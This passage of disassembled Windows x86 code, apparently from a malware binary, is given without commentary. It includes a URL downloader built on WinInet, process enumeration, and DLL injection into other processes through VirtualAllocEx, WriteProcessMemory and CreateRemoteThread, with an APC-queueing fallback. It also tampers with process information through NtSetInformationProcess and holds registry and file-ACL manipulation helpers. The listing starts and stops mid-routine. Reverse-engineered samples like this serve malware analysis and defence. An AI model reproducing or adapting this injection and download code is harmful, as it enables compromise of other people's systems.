push 274Ch ; iError
call WSASetLastError
jmp short loc_9AB9C8
sub_9AB936 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AB9DA(SOCKET fd, int, u_short netshort, int)
sub_9AB9DA proc near ; CODE XREF: sub_9AE3FA+40�p
exceptfds = fd_set ptr -228h
writefds = fd_set ptr -124h
Dst = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
timeout = timeval ptr -10h
var_8 = dword ptr -8
argp = dword ptr -4
fd = dword ptr 8
arg_4 = dword ptr 0Ch
netshort = word ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 228h
and [ebp+var_8], 0
push ebx
push esi
push edi
push 10h ; Size
xor esi, esi
lea eax, [ebp+Dst]
push 0 ; Val
inc esi
push eax ; Dst
mov [ebp+argp], esi
call memset
mov eax, [ebp+arg_4]
add esp, 0Ch
push dword ptr [ebp+netshort] ; netshort
mov [ebp+Dst], 2
mov [ebp+var_1C], eax
call ntohs
mov edi, [ebp+fd]
mov ebx, ioctlsocket
mov [ebp+var_1E], ax
lea eax, [ebp+argp]
push eax ; argp
push 8004667Eh ; cmd
push edi ; s
call ebx ; ioctlsocket
push 10h ; namelen
lea eax, [ebp+Dst]
push eax ; name
push edi ; s
call connect
cmp eax, 0FFFFFFFFh
jnz short loc_9ABA4D
call WSAGetLastError
cmp eax, 2733h
jnz short loc_9ABABE
loc_9ABA4D: ; CODE XREF: sub_9AB9DA+64�j
mov eax, [ebp+arg_C]
lea ecx, [ebp+timeout]
push ecx ; timeout
lea ecx, [ebp+exceptfds]
push ecx ; exceptfds
lea ecx, [ebp+writefds]
mov [ebp+timeout.tv_sec], eax
xor eax, eax
push ecx ; writefds
push eax ; readfds
push eax ; nfds
mov [ebp+writefds.fd_array], edi
mov [ebp+writefds.fd_count], esi
mov [ebp+exceptfds.fd_array], edi
mov [ebp+exceptfds.fd_count], esi
mov [ebp+timeout.tv_usec], eax
call select
mov [ebp+arg_4], eax
lea eax, [ebp+var_8]
push eax ; argp
push 8004667Eh ; cmd
push edi ; s
call ebx ; ioctlsocket
cmp [ebp+arg_4], esi
jl short loc_9ABAB3
lea eax, [ebp+writefds]
push eax ; fd_set *
push edi ; fd
call __WSAFDIsSet
test eax, eax
jz short loc_9ABAB3
xor eax, eax
jmp short loc_9ABAC1
; ---------------------------------------------------------------------------
loc_9ABAB3: ; CODE XREF: sub_9AB9DA+C2�j
; sub_9AB9DA+D3�j
push 274Ch ; iError
call WSASetLastError
loc_9ABABE: ; CODE XREF: sub_9AB9DA+71�j
or eax, 0FFFFFFFFh
loc_9ABAC1: ; CODE XREF: sub_9AB9DA+D7�j
pop edi
pop esi
pop ebx
leave
retn
sub_9AB9DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ABAC6(LPCSTR lpszUrl, int, int)
sub_9ABAC6 proc near ; CODE XREF: sub_9A9580+5E�p
; sub_9AC476+5E�p ...
szAgent = byte ptr -420h
var_20 = dword ptr -20h
dwIndex = dword ptr -1Ch
hInternet = dword ptr -18h
Buffer = dword ptr -14h
hFile = dword ptr -10h
dwNumberOfBytesRead= dword ptr -0Ch
dwBufferLength = dword ptr -8
var_4 = dword ptr -4
lpszUrl = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 420h
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
push ebx
push esi
push edi
lea eax, [ebp+dwBufferLength]
push eax ; cbSize
lea eax, [ebp+szAgent]
push eax ; pszUAOut
push 0 ; dwOption
mov [ebp+dwBufferLength], 400h
call ObtainUserAgentString
mov esi, 10000h
push esi ; dwBytes
push 40h ; uFlags
mov ebx, esi
call GlobalAlloc
mov edi, eax
xor eax, eax
cmp edi, eax
jz loc_9ABC08
xor ecx, ecx
cmp [ebp+arg_8], eax
push eax ; dwFlags
setnz cl
push eax ; lpszProxyBypass
push eax ; lpszProxy
lea eax, [ebp+szAgent]
push ecx ; dwAccessType
push eax ; lpszAgent
call InternetOpenA
test eax, eax
mov [ebp+hInternet], eax
jz loc_9ABC08
xor eax, eax
push eax ; dwContext
push 84080300h ; dwFlags
push eax ; dwHeadersLength
push eax ; lpszHeaders
push [ebp+lpszUrl] ; lpszUrl
push [ebp+hInternet] ; hInternet
call InternetOpenUrlA
test eax, eax
mov [ebp+hFile], eax
jz loc_9ABBFF
and [ebp+dwIndex], 0
lea ecx, [ebp+dwIndex]
push ecx ; lpdwIndex
lea ecx, [ebp+dwBufferLength]
push ecx ; lpdwBufferLength
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
push 20000013h ; dwInfoLevel
push eax ; hRequest
mov [ebp+Buffer], 1F4h
mov [ebp+dwBufferLength], 4
call HttpQueryInfoA
test eax, eax
jz short loc_9ABBF6
cmp [ebp+Buffer], 0C8h
jnz short loc_9ABBF6
and [ebp+dwNumberOfBytesRead], 0
and [ebp+var_4], 0
lea eax, [ebp+dwNumberOfBytesRead]
push eax
push esi
push edi
jmp short loc_9ABBE1
; ---------------------------------------------------------------------------
loc_9ABB99: ; CODE XREF: sub_9ABAC6+126�j
mov eax, [ebp+dwNumberOfBytesRead]
test eax, eax
jz short loc_9ABBEE
add [ebp+var_4], eax
cmp [ebp+var_4], ebx
jnz short loc_9ABBD2
lea esi, [ebx+ebx]
push esi ; dwBytes
push 40h ; uFlags
call GlobalAlloc
test eax, eax
mov [ebp+var_20], eax
jz short loc_9ABBEE
push ebx ; Size
push edi ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
push edi ; hMem
call GlobalFree
mov edi, [ebp+var_20]
mov ebx, esi
loc_9ABBD2: ; CODE XREF: sub_9ABAC6+E0�j
lea eax, [ebp+dwNumberOfBytesRead]
push eax ; lpdwNumberOfBytesRead
mov eax, [ebp+var_4]
mov ecx, ebx
sub ecx, eax
push ecx ; dwNumberOfBytesToRead
add eax, edi
push eax ; lpBuffer
loc_9ABBE1: ; CODE XREF: sub_9ABAC6+D1�j
push [ebp+hFile] ; hFile
call InternetReadFile
test eax, eax
jnz short loc_9ABB99
loc_9ABBEE: ; CODE XREF: sub_9ABAC6+D8�j
; sub_9ABAC6+F3�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
mov [ecx], eax
loc_9ABBF6: ; CODE XREF: sub_9ABAC6+B8�j
; sub_9ABAC6+C1�j
push [ebp+hFile] ; hInternet
call InternetCloseHandle
loc_9ABBFF: ; CODE XREF: sub_9ABAC6+86�j
push [ebp+hInternet] ; hInternet
call InternetCloseHandle
loc_9ABC08: ; CODE XREF: sub_9ABAC6+41�j
; sub_9ABAC6+65�j
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_9ABC1D
test edi, edi
jz short loc_9ABC1D
push edi ; hMem
call GlobalFree
xor edi, edi
loc_9ABC1D: ; CODE XREF: sub_9ABAC6+148�j
; sub_9ABAC6+14C�j
mov eax, edi
pop edi
pop esi
pop ebx
leave
retn
sub_9ABAC6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ABC24(char *Str2)
sub_9ABC24 proc near ; CODE XREF: sub_9A74E1+2A�p
; sub_9AA5A0+8�p ...
pe = PROCESSENTRY32 ptr -128h
Str2 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 128h
push ebx
push esi
xor ebx, ebx
push ebx ; th32ProcessID
push 2 ; dwFlags
call CreateToolhelp32Snapshot
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_9ABC9E
push edi
push 49h
pop ecx
xor eax, eax
mov [ebp+pe.dwSize], 128h
lea edi, [ebp+pe.cntUsage]
rep stosd
lea eax, [ebp+pe]
push eax ; lppe
push esi ; hSnapshot
call Process32First
pop edi
jmp short loc_9ABC8B
; ---------------------------------------------------------------------------
loc_9ABC68: ; CODE XREF: sub_9ABC24+69�j
push [ebp+Str2] ; Str2
lea eax, [ebp+pe.szExeFile]
push eax ; Str1
call _stricmp
test eax, eax
pop ecx
pop ecx
jz short loc_9ABC91
lea eax, [ebp+pe]
push eax ; lppe
push esi ; hSnapshot
call Process32Next
loc_9ABC8B: ; CODE XREF: sub_9ABC24+42�j
test eax, eax
jnz short loc_9ABC68
jmp short loc_9ABC97
; ---------------------------------------------------------------------------
loc_9ABC91: ; CODE XREF: sub_9ABC24+58�j
mov ebx, [ebp+pe.th32ProcessID]
loc_9ABC97: ; CODE XREF: sub_9ABC24+6B�j
push esi ; hObject
call CloseHandle
loc_9ABC9E: ; CODE XREF: sub_9ABC24+1A�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9ABC24 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ABCA4(DWORD dwProcessId, char *lpBuffer)
sub_9ABCA4 proc near ; CODE XREF: sub_9A74E1+1A�p
; sub_9A74E1+36�p ...
te = THREADENTRY32 ptr -3Ch
ThreadId = dword ptr -20h
NumberOfBytesWritten= dword ptr -1Ch
var_18 = dword ptr -18h
hProcess = dword ptr -14h
hObject = dword ptr -10h
lpStartAddress = dword ptr -0Ch
lpParameter = dword ptr -8
var_4 = dword ptr -4
dwProcessId = dword ptr 8
lpBuffer = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
push esi
push edi
push [ebp+lpBuffer] ; Str
xor edi, edi
mov [ebp+var_4], edi
call strlen
pop ecx
push [ebp+dwProcessId] ; dwProcessId
mov esi, eax
push edi ; bInheritHandle
push 2Ah ; dwDesiredAccess
inc esi
call OpenProcess
cmp eax, edi
mov [ebp+hProcess], eax
jz loc_9ABE39
push 40h ; flProtect
push 3000h ; flAllocationType
lea ecx, [esi+20h]
push ecx ; dwSize
push edi ; lpAddress
push eax ; hProcess
call VirtualAllocEx
cmp eax, edi
mov [ebp+lpParameter], eax
jz loc_9ABE1F
mov edi, GetModuleHandleA
push ebx
push offset ProcName ; "LoadLibraryA"
push offset aKernel32_dll ; "kernel32.dll"
call edi ; GetModuleHandleA
mov ebx, GetProcAddress
push eax ; hModule
call ebx ; GetProcAddress
mov [ebp+lpStartAddress], eax
lea eax, [ebp+NumberOfBytesWritten]
push eax ; lpNumberOfBytesWritten
inc esi
push esi ; nSize
push [ebp+lpBuffer] ; lpBuffer
push [ebp+lpParameter] ; lpBaseAddress
push [ebp+hProcess] ; hProcess
call WriteProcessMemory
test eax, eax
jz loc_9ABE1E
lea eax, [ebp+ThreadId]
push eax ; lpThreadId
xor esi, esi
push esi ; dwCreationFlags
push [ebp+lpParameter] ; lpParameter
push [ebp+lpStartAddress] ; lpStartAddress
push esi ; dwStackSize
push esi ; lpThreadAttributes
push [ebp+hProcess] ; hProcess
call CreateRemoteThread
cmp eax, esi
jz short loc_9ABD57
mov [ebp+var_4], 1
push eax
jmp loc_9ABE18
; ---------------------------------------------------------------------------
loc_9ABD57: ; CODE XREF: sub_9ABCA4+A4�j
push offset aNtqueueapcthre ; "NtQueueApcThread"
push offset aNtdll_dll ; "ntdll.dll"
call edi ; GetModuleHandleA
push eax ; hModule
call ebx ; GetProcAddress
cmp eax, esi
mov [ebp+var_18], eax
jz loc_9ABE1E
push offset aLoadlibraryexa ; "LoadLibraryExA"
push offset aKernel32_dll ; "kernel32.dll"
call edi ; GetModuleHandleA
push eax ; hModule
call ebx ; GetProcAddress
push 0 ; th32ProcessID
push 4 ; dwFlags
mov [ebp+lpStartAddress], eax
call CreateToolhelp32Snapshot
cmp eax, 0FFFFFFFFh
mov [ebp+hObject], eax
jz loc_9ABE1E
push 6
pop ecx
xor eax, eax
lea edi, [ebp+te.cntUsage]
rep stosd
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
mov [ebp+te.dwSize], 1Ch
call Thread32First
jmp short loc_9ABE11
; ---------------------------------------------------------------------------
loc_9ABDB7: ; CODE XREF: sub_9ABCA4+16F�j
mov eax, [ebp+dwProcessId]
cmp eax, [ebp+te.th32OwnerProcessID]
jnz short loc_9ABE05
push [ebp+te.th32ThreadID] ; dwThreadId
xor esi, esi
push esi ; bInheritHandle
push 10h ; dwDesiredAccess
call OpenThread
mov ebx, eax
cmp ebx, esi
jz short loc_9ABE05
push esi
push esi
push [ebp+lpParameter]
push [ebp+lpStartAddress]
push ebx
call [ebp+var_18]
push ebx ; hObject
mov edi, eax
call CloseHandle
push edi
push [ebp+te.th32ThreadID]
push offset aThread08xStatu ; "thread: %08x, status: %08x\n"
call printf
add esp, 0Ch
cmp edi, esi
jl short loc_9ABE05
mov [ebp+var_4], 1
loc_9ABE05: ; CODE XREF: sub_9ABCA4+119�j
; sub_9ABCA4+12D�j ...
lea eax, [ebp+te]
push eax ; lpte
push [ebp+hObject] ; hSnapshot
call Thread32Next
loc_9ABE11: ; CODE XREF: sub_9ABCA4+111�j
test eax, eax
jnz short loc_9ABDB7
push [ebp+hObject] ; hObject
loc_9ABE18: ; CODE XREF: sub_9ABCA4+AE�j
call CloseHandle
loc_9ABE1E: ; CODE XREF: sub_9ABCA4+84�j
; sub_9ABCA4+C7�j ...
pop ebx
loc_9ABE1F: ; CODE XREF: sub_9ABCA4+48�j
push [ebp+hProcess] ; hObject
call CloseHandle
cmp [ebp+var_4], 0
jz short loc_9ABE39
push 5DCh ; dwMilliseconds
call Sleep
loc_9ABE39: ; CODE XREF: sub_9ABCA4+2A�j
; sub_9ABCA4+188�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_9ABCA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=6Ch
sub_9ABE40 proc near ; CODE XREF: sub_9ABECA+61�p
Buffer = byte ptr -8Ch
var_7C = dword ptr -7Ch
Src = byte ptr -4Ch
Dst = word ptr -0Ch
var_8 = dword ptr -8
NumberOfBytesRead= dword ptr -4
hProcess = dword ptr 8
lpBaseAddress = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
lea ebp, [esp-6Ch]
sub esp, 8Ch
push esi
mov esi, ReadProcessMemory
push edi
lea eax, [ebp+6Ch+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
mov edi, 80h
push edi ; nSize
lea eax, [ebp+6Ch+Buffer]
push eax ; lpBuffer
push [ebp+6Ch+lpBaseAddress] ; lpBaseAddress
push [ebp+6Ch+hProcess] ; hProcess
call esi ; ReadProcessMemory
test eax, eax
jnz short loc_9ABE71
loc_9ABE6D: ; CODE XREF: sub_9ABE40+44�j
; sub_9ABE40+64�j
xor eax, eax
jmp short loc_9ABEC3
; ---------------------------------------------------------------------------
loc_9ABE71: ; CODE XREF: sub_9ABE40+2B�j
lea eax, [ebp+6Ch+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
push edi ; nSize
lea eax, [ebp+6Ch+Buffer]
push eax ; lpBuffer
push [ebp+6Ch+var_7C] ; lpBaseAddress
push [ebp+6Ch+hProcess] ; hProcess
call esi ; ReadProcessMemory
test eax, eax
jz short loc_9ABE6D
push 8 ; Size
lea eax, [ebp+6Ch+Src]
push eax ; Src
lea eax, [ebp+6Ch+Dst]
push eax ; Dst
call memcpy
movzx eax, [ebp+6Ch+Dst]
mov ecx, [ebp+6Ch+arg_8]
add esp, 0Ch
shr eax, 1
dec ecx
cmp ecx, eax
jb short loc_9ABE6D
and word ptr [ebx+eax*2], 0
lea eax, [ebp+6Ch+NumberOfBytesRead]
push eax ; lpNumberOfBytesRead
movzx eax, [ebp+6Ch+Dst]
push eax ; nSize
push ebx ; lpBuffer
push [ebp+6Ch+var_8] ; lpBaseAddress
push [ebp+6Ch+hProcess] ; hProcess
call esi ; ReadProcessMemory
neg eax
sbb eax, eax
neg eax
loc_9ABEC3: ; CODE XREF: sub_9ABE40+2F�j
pop edi
pop esi
add ebp, 6Ch
leave
retn
sub_9ABE40 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ABECA(DWORD dwProcessId, int, int)
sub_9ABECA proc near ; CODE XREF: sub_9ABF43+71�p
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_4 = byte ptr -4
dwProcessId = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
push offset aNtqueryinforma ; "NtQueryInformationProcess"
push offset aNtdll_dll ; "ntdll.dll"
call GetModuleHandleA
push eax ; hModule
call GetProcAddress
mov ebx, eax
xor edi, edi
cmp ebx, edi
jnz short loc_9ABEF5
xor eax, eax
jmp short loc_9ABF3F
; ---------------------------------------------------------------------------
loc_9ABEF5: ; CODE XREF: sub_9ABECA+25�j
push esi
push [ebp+dwProcessId] ; dwProcessId
push edi ; bInheritHandle
push 410h ; dwDesiredAccess
call OpenProcess
mov esi, eax
cmp esi, edi
jnz short loc_9ABF0F
xor eax, eax
jmp short loc_9ABF3E
; ---------------------------------------------------------------------------
loc_9ABF0F: ; CODE XREF: sub_9ABECA+3F�j
lea eax, [ebp+var_4]
push eax
push 18h
lea eax, [ebp+var_1C]
push eax
push edi
push esi
call ebx
test eax, eax
jl short loc_9ABF35
push [ebp+arg_8]
mov ebx, [ebp+arg_4]
push [ebp+var_18]
push esi
call sub_9ABE40
add esp, 0Ch
mov edi, eax
loc_9ABF35: ; CODE XREF: sub_9ABECA+55�j
push esi ; hObject
call CloseHandle
mov eax, edi
loc_9ABF3E: ; CODE XREF: sub_9ABECA+43�j
pop esi
loc_9ABF3F: ; CODE XREF: sub_9ABECA+29�j
pop edi
pop ebx
leave
retn
sub_9ABECA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9ABF43(LPCWSTR lpSrch)
sub_9ABF43 proc near ; CODE XREF: sub_9A74E1+9�p
; sub_9AA56C+8�p
First = word ptr -330h
var_32E = byte ptr -32Eh
pe = PROCESSENTRY32 ptr -128h
lpSrch = dword ptr 8
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push esi
xor ebx, ebx
push ebx ; th32ProcessID
push 2 ; dwFlags
call CreateToolhelp32Snapshot
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_9ABFF5
push edi
push 49h
pop ecx
xor eax, eax
mov [ebp+pe.dwSize], 128h
lea edi, [ebp+pe.cntUsage]
rep stosd
lea eax, [ebp+pe]
push eax ; lppe
push esi ; hSnapshot
call Process32First
jmp short loc_9ABFE1
; ---------------------------------------------------------------------------
loc_9ABF8A: ; CODE XREF: sub_9ABF43+A0�j
xor eax, eax
mov [ebp+First], bx
mov ecx, 81h
lea edi, [ebp+var_32E]
rep stosd
stosw
push 104h ; int
lea eax, [ebp+First]
push eax ; int
push [ebp+pe.th32ProcessID] ; dwProcessId
call sub_9ABECA
add esp, 0Ch
test eax, eax
jz short loc_9ABFD4
push [ebp+lpSrch] ; lpSrch
lea eax, [ebp+First]
push eax ; lpFirst
call StrStrIW
test eax, eax
jnz short loc_9ABFE7
loc_9ABFD4: ; CODE XREF: sub_9ABF43+7B�j
lea eax, [ebp+pe]
push eax ; lppe
push esi ; hSnapshot
call Process32Next
loc_9ABFE1: ; CODE XREF: sub_9ABF43+45�j
test eax, eax
jnz short loc_9ABF8A
jmp short loc_9ABFED
; ---------------------------------------------------------------------------
loc_9ABFE7: ; CODE XREF: sub_9ABF43+8F�j
mov ebx, [ebp+pe.th32ProcessID]
loc_9ABFED: ; CODE XREF: sub_9ABF43+A2�j
push esi ; hObject
call CloseHandle
pop edi
loc_9ABFF5: ; CODE XREF: sub_9ABF43+1A�j
pop esi
mov eax, ebx
pop ebx
leave
retn
sub_9ABF43 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ABFFB proc near ; CODE XREF: sub_9A799E+24�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
mov esi, GetModuleHandleA
push edi
push offset aNtqueryinforma ; "NtQueryInformationProcess"
mov ebx, offset aNtdll_dll ; "ntdll.dll"
push ebx ; lpModuleName
call esi ; GetModuleHandleA
mov edi, GetProcAddress
push eax ; hModule
call edi ; GetProcAddress
push offset aNtsetinformati ; "NtSetInformationProcess"
push ebx ; lpModuleName
mov [ebp+var_8], eax
call esi ; GetModuleHandleA
push eax ; hModule
call edi ; GetProcAddress
mov esi, eax
xor eax, eax
cmp [ebp+var_8], eax
jz short loc_9AC05F
cmp esi, eax
jz short loc_9AC05F
push eax
push 4
mov [ebp+var_4], eax
lea eax, [ebp+var_4]
push eax
push 22h
push 0FFFFFFFFh
call [ebp+var_8]
test eax, eax
jl short loc_9AC05F
or [ebp+var_4], 70h
push 4
lea eax, [ebp+var_4]
push eax
push 22h
push 0FFFFFFFFh
call esi
loc_9AC05F: ; CODE XREF: sub_9ABFFB+39�j
; sub_9ABFFB+3D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_9ABFFB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC064(HKEY hKey, LPCSTR lpSubKey, LPCSTR lpValueName, BYTE *lpData, DWORD cbData, DWORD dwType)
sub_9AC064 proc near ; CODE XREF: sub_9AC0F9+15�p
phkResult = dword ptr -4
hKey = dword ptr 8
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
cbData = dword ptr 18h
dwType = dword ptr 1Ch
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+phkResult]
push eax ; phkResult
push 20006h ; samDesired
xor esi, esi
push esi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
push [ebp+hKey] ; hKey
call RegOpenKeyExA
test eax, eax
jnz short loc_9AC0A9
push [ebp+cbData] ; cbData
push [ebp+lpData] ; lpData
push [ebp+dwType] ; dwType
push esi ; Reserved
push [ebp+lpValueName] ; lpValueName
push [ebp+phkResult] ; hKey
call RegSetValueExA
test eax, eax
jnz short loc_9AC0A0
inc esi
loc_9AC0A0: ; CODE XREF: sub_9AC064+39�j
push [ebp+phkResult] ; hKey
call RegCloseKey
loc_9AC0A9: ; CODE XREF: sub_9AC064+1F�j
mov eax, esi
pop esi
leave
retn
sub_9AC064 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC0AE(int, LPCSTR lpSubKey, LPCSTR lpValueName, LPBYTE lpData, DWORD cbData)
sub_9AC0AE proc near ; CODE XREF: sub_9AC117+12�p
hKey = dword ptr -4
lpSubKey = dword ptr 0Ch
lpValueName = dword ptr 10h
lpData = dword ptr 14h
cbData = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push esi
lea eax, [ebp+hKey]
push eax ; phkResult
push 20019h ; samDesired
xor esi, esi
push esi ; ulOptions
push [ebp+lpSubKey] ; lpSubKey
push 80000002h ; hKey
call RegOpenKeyExA
test eax, eax
jnz short loc_9AC0F4
lea eax, [ebp+cbData]
push eax ; lpcbData
push [ebp+lpData] ; lpData
push esi ; lpType
push esi ; lpReserved
push [ebp+lpValueName] ; lpValueName
push [ebp+hKey] ; hKey
call RegQueryValueExA
test eax, eax
jnz short loc_9AC0EB
inc esi
loc_9AC0EB: ; CODE XREF: sub_9AC0AE+3A�j
push [ebp+hKey] ; hKey
call RegCloseKey
loc_9AC0F4: ; CODE XREF: sub_9AC0AE+21�j
mov eax, esi
pop esi
leave
retn
sub_9AC0AE endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC0F9(HKEY hKey, LPCSTR lpSubKey, LPCSTR lpValueName, BYTE Data)
sub_9AC0F9 proc near ; CODE XREF: sub_9A7170+82�p
; sub_9A81C3+17�p ...
hKey = dword ptr 4
lpSubKey = dword ptr 8
lpValueName = dword ptr 0Ch
Data = byte ptr 10h
push 4 ; dwType
push 4 ; cbData
lea eax, [esp+8+Data]
push eax ; lpData
push [esp+0Ch+lpValueName] ; lpValueName
push [esp+10h+lpSubKey] ; lpSubKey
push [esp+14h+hKey] ; hKey
call sub_9AC064
add esp, 18h
retn
sub_9AC0F9 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC117(int, LPCSTR lpSubKey, LPCSTR lpValueName, LPBYTE lpData)
sub_9AC117 proc near ; CODE XREF: sub_9A7170+5F�p
; sub_9A81F5+24�p ...
arg_0 = dword ptr 4
lpSubKey = dword ptr 8
lpValueName = dword ptr 0Ch
lpData = dword ptr 10h
push 4 ; cbData
push [esp+4+lpData] ; lpData
push [esp+8+lpValueName] ; lpValueName
push [esp+0Ch+lpSubKey] ; lpSubKey
push [esp+10h+arg_0] ; int
call sub_9AC0AE
add esp, 14h
retn
sub_9AC117 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC132(LPCSTR lpFileName, int)
sub_9AC132 proc near ; CODE XREF: sub_9AABA4+32E�p
; sub_9AC163+2E�p ...
lpFileName = dword ptr 4
arg_4 = dword ptr 8
push [esp+lpFileName] ; lpFileName
call GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short locret_9AC162
cmp [esp+arg_4], 0
jz short loc_9AC152
test al, 1
jz short locret_9AC162
and eax, 26h
push eax
jmp short loc_9AC158
; ---------------------------------------------------------------------------
loc_9AC152: ; CODE XREF: sub_9AC132+14�j
test al, 1
jnz short locret_9AC162
push 7 ; dwFileAttributes
loc_9AC158: ; CODE XREF: sub_9AC132+1E�j
push [esp+4+lpFileName] ; lpFileName
call SetFileAttributesA
locret_9AC162: ; CODE XREF: sub_9AC132+D�j
; sub_9AC132+18�j ...
retn
sub_9AC132 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9AC163(LPCSTR lpFileName, int)
sub_9AC163 proc near ; CODE XREF: sub_9A752A+6B�p
; sub_9A7670+26�p ...
pSecurityDescriptor= byte ptr -44h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -30h
nAclLength = dword ptr -28h
var_24 = dword ptr -24h
pSid = dword ptr -20h
hMem = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
lpFileName = dword ptr 8
arg_4 = dword ptr 0Ch
push 34h
push offset stru_9A4478
call __SEH_prolog
xor ebx, ebx
mov [ebp+var_24], ebx
mov [ebp+hMem], ebx
mov [ebp+pSid], ebx
mov [ebp+ms_exc.disabled], ebx
mov edi, [ebp+arg_4]
mov eax, edi
mov esi, 120116h
and eax, esi
cmp eax, esi
jz short loc_9AC198
push ebx ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AC132
pop ecx
pop ecx
loc_9AC198: ; CODE XREF: sub_9AC163+28�j
mov [ebp+pIdentifierAuthority.Value], bl
mov [ebp+pIdentifierAuthority.Value+1], bl
mov [ebp+pIdentifierAuthority.Value+2], bl
mov [ebp+pIdentifierAuthority.Value+3], bl
mov [ebp+pIdentifierAuthority.Value+4], bl
mov [ebp+pIdentifierAuthority.Value+5], 1
push 1 ; dwRevision
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call InitializeSecurityDescriptor
lea eax, [ebp+pSid]
push eax ; pSid
push ebx ; nSubAuthority7
push ebx ; nSubAuthority6
push ebx ; nSubAuthority5
push ebx ; nSubAuthority4
push ebx ; nSubAuthority3
push ebx ; nSubAuthority2
push ebx ; nSubAuthority1
push ebx ; nSubAuthority0
push 1 ; nSubAuthorityCount
lea eax, [ebp+pIdentifierAuthority]
push eax ; pIdentifierAuthority
call AllocateAndInitializeSid
push [ebp+pSid] ; pSid
call GetLengthSid
add eax, 10h
mov [ebp+nAclLength], eax
push eax ; dwBytes
push 40h ; uFlags
call GlobalAlloc
mov [ebp+hMem], eax
cmp eax, ebx
jz short loc_9AC246
or edi, 100000h
mov [ebp+arg_4], edi
push 2 ; dwAclRevision
push [ebp+nAclLength] ; nAclLength
push eax ; pAcl
call InitializeAcl
push [ebp+pSid] ; pSid
push edi ; AccessMask
push 2 ; dwAceRevision
push [ebp+hMem] ; pAcl
call AddAccessAllowedAce
push ebx ; bDaclDefaulted
push [ebp+hMem] ; pDacl
push 1 ; bDaclPresent
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
call SetSecurityDescriptorDacl
lea eax, [ebp+pSecurityDescriptor]
push eax ; pSecurityDescriptor
push 4 ; SecurityInformation
push [ebp+lpFileName] ; lpFileName
call SetFileSecurityA
mov [ebp+var_24], eax
and edi, esi
cmp edi, esi
jnz short loc_9AC246
push 1 ; int
push [ebp+lpFileName] ; lpFileName
call sub_9AC132
pop ecx
pop ecx
loc_9AC246: ; CODE XREF: sub_9AC163+89�j
; sub_9AC163+D5�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
jmp short loc_9AC259
; ---------------------------------------------------------------------------
loc_9AC24C: ; DATA XREF: .text:stru_9A4478�o
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_9AC250: ; DATA XREF: .text:stru_9A4478�o
mov esp, [ebp+ms_exc.old_esp]
or [ebp+ms_exc.disabled], 0FFFFFFFFh
xor ebx, ebx
loc_9AC259: ; CODE XREF: sub_9AC163+E7�j
cmp [ebp+hMem], ebx
jz short loc_9AC267
push [ebp+hMem] ; hMem
call GlobalFree
loc_9AC267: ; CODE XREF: sub_9AC163+F9�j
cmp [ebp+pSid], ebx
jz short loc_9AC275
push [ebp+pSid] ; pSid
call FreeSid
loc_9AC275: ; CODE XREF: sub_9AC163+107�j
mov eax, [ebp+var_24]
call __SEH_epilog
retn
sub_9AC163 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_9AC27E(char *Source, char *Str)
sub_9AC27E proc near ; CODE XREF: sub_9A722A+31�p
Source = dword ptr 4
Str = dword ptr 8
push esi
push [esp+4+Source] ; Source
mov esi, [esp+8+Str]
push esi ; Dest
call strcpy
push 5Ch ; Ch
